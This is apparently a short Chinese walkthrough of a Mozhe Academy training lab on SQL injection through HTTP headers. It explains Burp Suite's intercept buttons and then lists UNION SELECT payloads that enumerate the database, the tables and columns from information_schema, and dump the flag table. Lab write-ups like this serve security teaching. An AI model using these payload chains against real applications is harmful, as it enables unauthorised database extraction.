墨者学院--SQL注入漏洞测试(HTTP头注入)

这道题需要使用到Burp suite这个工具。先简单的说下使用步骤:
墨者学院--SQL注入漏洞测试(HTTP头注入)_第1张图片墨者学院--SQL注入漏洞测试(HTTP头注入)_第2张图片墨者学院--SQL注入漏洞测试(HTTP头注入)_第3张图片
简述下4个按钮的作用:
①Forward的功能是当你查看过消息或者重新编辑过消息之后,点击此按钮,将发送消息至服务器端。
②Drop的功能是你想丢失当前拦截的消息,不再forward到服务器端。
③Interception is on表示拦截功能打开,拦截所有通过Burp Proxy的请求数据;Interception is off表示拦截功能关闭,不再拦截通过Burp Proxy的所有请求数据。
④ Action的功能是除了将当前请求的消息传递到Spider、Scanner、Repeater、Intruder、Sequencer、Decoder、Comparer组件外,还可以做一些请求消息的修改。

开始做题:
访问页面:
墨者学院--SQL注入漏洞测试(HTTP头注入)_第4张图片省略查询多少个字段步骤

墨者学院--SQL注入漏洞测试(HTTP头注入)_第5张图片进行回显查找:union select 1,2,3,4
墨者学院--SQL注入漏洞测试(HTTP头注入)_第6张图片之后操作语句:
查询库名:union select 1,2,3,database()
查询表名:union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=‘pentesterlab’
查询字段名:union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name=‘flag’
查询值:
union select 1,flag,3,4 from flag

你可能感兴趣的:(web安全)